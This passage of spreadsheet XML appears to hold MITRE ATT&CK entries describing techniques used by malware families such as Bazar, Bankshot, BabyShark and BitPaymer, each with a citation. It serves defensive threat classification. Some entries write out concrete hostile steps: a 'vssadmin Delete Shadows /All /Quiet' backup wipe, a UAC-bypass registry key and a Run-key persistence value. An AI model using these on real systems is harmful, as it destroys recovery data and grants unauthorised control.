  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used &lt;code&gt;dir&lt;/code&gt; to search for "programfiles" and "appdata".(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has downloaded additional files from the C2.(Citation: Unit42 BabyShark Apr 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has a [PowerShell](https://attack.mitre.org/techniques/T1059/001)-based remote administration ability that can implement a PowerShell or C# based keylogger.(Citation: Unit42 BabyShark Apr 2019)</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used mshta.exe to download and execute applications from a remote server.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;tasklist&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;reg query&lt;/code&gt; command for &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence.(Citation: Unit42 BabyShark Feb 2019)(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used scheduled tasks to maintain persistence.(Citation: Crowdstrike GTR2020 Mar 2020)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has encoded data using [certutil](https://attack.mitre.org/software/S0160) before exfiltration.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ver&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ipconfig /all&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;whoami&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) has used cmd.exe to execute commands.(Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has been signed with self signed digital certificates mimicking a legitimate software company.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used a custom routine to decrypt strings.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to remove files and folders related to previous infections.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to set folders or files to be hidden from the Windows Explorer default view.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and execute additional payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has compromised victims via links to URLs hosting malicious content.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has hidden malicious payloads in &lt;code&gt;%USERPROFILE%\Adobe\Driver\dwg\&lt;/code&gt; and mimicked the legitimate DHCP service binary.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can leverage API functions such as &lt;code&gt;ShellExecuteA&lt;/code&gt; and &lt;code&gt;HttpOpenRequestA&lt;/code&gt; in the process of downloading and executing files.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used compressed and decimal encoded VBS scripts.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>Office Template Macros</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use hidden columns in Excel spreadsheets to store executable files or commands for VBA macros.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use scheduled tasks to repeatedly execute malicious payloads on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) has the ability to use HTTPS for C2 communiations.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[BackConfig](https://attack.mitre.org/software/S0475) can download and run batch files to execute commands on a compromised host.(Citation: Unit 42 BackConfig May 2020)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) writes collected data to a temporary file in an encrypted form before exfiltration to a C2 server.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples contain a publicly available Web browser password recovery tool.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects address book information from Outlook.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) contains a cleanup module that removes traces of itself from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about running processes.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) injects itself into explorer.exe.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) adds Registry Run keys to achieve persistence.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>Some [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) samples use standard Base64 + bzip2, and some use standard Base64 + reverse XOR + RSA-2048 to decrypt data received from C2 servers.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the OS and computer name.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the Internet adapter configuration.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects the current username from the victim.(Citation: Symantec Dragonfly)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects files from the local system that have the following extensions, then prepares them for exfiltration: .xls, .xlsx, .pdf, .mdb, .rar, .zip, .doc, .docx.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) searches for files with specific file extensions.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) can download and execute or update malware.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) has a keylogging capability.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) stores collected data in log files before exfiltration.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses SMTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) establishes a foothold by adding a link to the malware executable in the startup folder.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) captures screenshots in .jpg format and then exfiltrates them.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses WMI to enumerate installed security products in the victim’s environment.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) attempts to detect if it is being run in a Virtual Machine (VM) using a WMI query for disk drive name, BIOS, and motherboard information. (Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[BadPatch](https://attack.mitre.org/software/S0337) uses HTTP for C2.(Citation: Unit 42 BadPatch Oct 2017)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing audio.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) contains keylogging capabilities(Citation: BH Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has been launched by starting iexplore.exe and replacing it with [Bandook](https://attack.mitre.org/software/S0234)'s payload.(Citation: Lookout Dark Caracal Jan 2018)(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of taking an image of and uploading the current desktop.(Citation: Lookout Dark Caracal Jan 2018)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) has modules that are capable of capturing from a victim's webcam.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is capable of spawning a Windows command shell.(Citation: EFF Manul Aug 2016)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) recursively generates a list of files within a directory and sends them back to the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) grabs a user token using WTSQueryUserToken and then creates a process by impersonating a logged-on user.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) collects files from the local system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) decodes embedded XOR strings.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers domain and account names/information through process monitoring.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) exfiltrates data over its C2 channel.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims’ machines.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) marks files to be deleted upon the next system reboot and uninstalls and removes itself from the system.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for files on the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) deletes all artifacts associated with the malware from the infected machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uploads files and secondary payloads to the victim's machine.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) writes data into the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Pniumj&lt;/code&gt;.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA().(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) encodes commands from the control server using a range of characters and gzip.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) binds and listens on port 1058 for HTTP traffic while also utilizing a FakeTLS method.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) identifies processes and collects the process ids.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) generates a false TLS handshake using a public certificate to disguise C2 network communications.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) searches for certain Registry keys to be configured before executing the payload.(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) gathers system information, network addresses, disk type, disk free space, and the operation system version.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) modifies the time of a file as specified by the control server.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses HTTP for command and control communication.(Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) uses the command-line interface to execute arbitrary commands.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) can terminate a specific process by its process id.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use TLS in C2 communications.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been downloaded via Windows BITS functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been signed with fake certificates including those appearing to be from VB CORPORATE PTY. LTD.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can retrieve information from the infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can decrypt downloaded payloads. [Bazar](https://attack.mitre.org/software/S0534) also resolves strings and API calls at runtime.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has manually loaded ntdll from disk in order to identity and remove API hooks set by security products.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to identify domain administrator accounts.(Citation: NCC Group Team9 June 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can implement DGA using the current date as a seed variable.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use [Nltest](https://attack.mitre.org/software/S0359) tools to obtain information about the domain.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has the ability to use an alternative C2 server if the primary server fails.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can delete its loader using a batch file in the Windows temporary folder.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate the victim's desktop.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534)'s loader can delete scheduled tasks created by a previous instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can download and deploy additional payloads including ransomware and post-exploitation frameworks such as [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify administrator accounts on an infected host.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can gain execution via malicious links to decoy landing pages hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a task named to appear benign.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has used dual-extension executable files such as PreviewReport.DOC.exe.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader has named malicious shortcuts adobe.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>The [Bazar](https://attack.mitre.org/software/S0534) loader is used to download and execute the [Bazar](https://attack.mitre.org/software/S0534) backdoor.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use various APIs to allocate memory and facilitate code execution/injection.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate shared drives on the domain.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has used XOR, RSA2, and RC4 encrypted files.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a PowerShell script received from C2.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identity the current process on a compromised host.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>Process Doppelgänging</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process using process doppelgänging.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject into a target process including Svchost, Explorer, and cmd using process hollowing.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can inject code through calling &lt;code&gt;VirtualAllocExNuma&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query &lt;code&gt;Windows\CurrentVersion\Uninstall&lt;/code&gt; for installed applications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create or add files to Registry Run Keys to establish persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can enumerate remote systems using &lt;code&gt; Net View&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can create a scheduled task for persistence.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the installed antivirus engine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can establish persistence by writing shortcuts to the Windows Startup folder.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can query the Registry for installed applications.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has a variant with a packed payload.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) has been spread via e-mails with embedded malicious links.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can send C2 communications with XOR encryption.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can fingerprint architecture, computer name, and OS version on the compromised host. [Bazar](https://attack.mitre.org/software/S0534) can also check if the Russian language is installed on the infected machine and terminate if it is found.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the IP address and NetBIOS name of an infected machine.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can identify the username of the infected user.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can collect the time on the compromised host.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use a timer to delay execution of core functionality.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can attempt to overload sandbox analysis by sending 1550 calls to &lt;code&gt;printf&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use HTTP and HTTPS over ports 80 and 443 in C2 communications.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) downloads have been hosted on Google Docs.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can launch cmd.exe to perform reconnaissance commands.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can execute a WMI query to gather information about the installed antivirus engine.(Citation: Cybereason Bazar July 2020)(Citation: DFIR Ryuk's Return October 2020)</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>[Bazar](https://attack.mitre.org/software/S0534) can use Winlogon Helper DLL to establish persistence.(Citation: Zscaler Bazar September 2020)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has decrypted function blocks using a XOR key during runtime to evade detection.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) is designed to download an implant from a C2 server.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>Junk Data</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used byte randomization to obscure its behavior.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has used a custom RC4 and XOR encrypted protocol over port 443 for C2.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) has encrypted payloads using RC4 and XOR.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t>[BendyBear](https://attack.mitre.org/software/S0574) can query the host's Registry key at &lt;code&gt;HKEY_CURRENT_USER\Console\QuickEdit&lt;/code&gt; to retrieve data.(Citation: Unit42 BendyBear Feb 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) has the ability to determine local time on a compromised host.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) can check for analysis environments and signs of debugging using the Windows API &lt;code&gt;kernel32!GetTickCountKernel32&lt;/code&gt; call.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) decodes strings in the malware using XOR and RC4.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) deletes its dropper and VBS scripts from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has the capability to download files to execute on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268)'s DLL file and non-malicious decoy file are encrypted with RC4.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can obtain a list of running processes on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) adds itself to the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; for persistence.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) uses rundll32.exe to execute as part of the Registry Run key it adds: &lt;code&gt;HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”&lt;/code&gt;.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some [Bisonal](https://attack.mitre.org/software/S0268) samples encrypt C2 communications with RC4.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has a command to gather system information from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can execute &lt;code&gt;ipconfig&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268)'s dropper creates VBS scripts on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) uses HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can launch cmd.exe to execute commands on the system.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can suppress UAC prompts by setting the &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt; registry key on Windows 10 or &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; on Windows 7 and launching the &lt;code&gt;eventvwr.msc&lt;/code&gt; process, which launches [BitPaymer](https://attack.mitre.org/software/S0570) with elevated privileges.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending &lt;code&gt;.locked&lt;/code&gt; to the filename.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) compares file names and paths to a list of excluded names and directory names during encryption.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) attempts to remove the backup shadow files from the host using &lt;code&gt;vssadmin.exe Delete Shadows /All /Quiet&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate the sessions for each user logged onto the infected host.(Citation: Crowdstrike Indrik November 2018)</t>
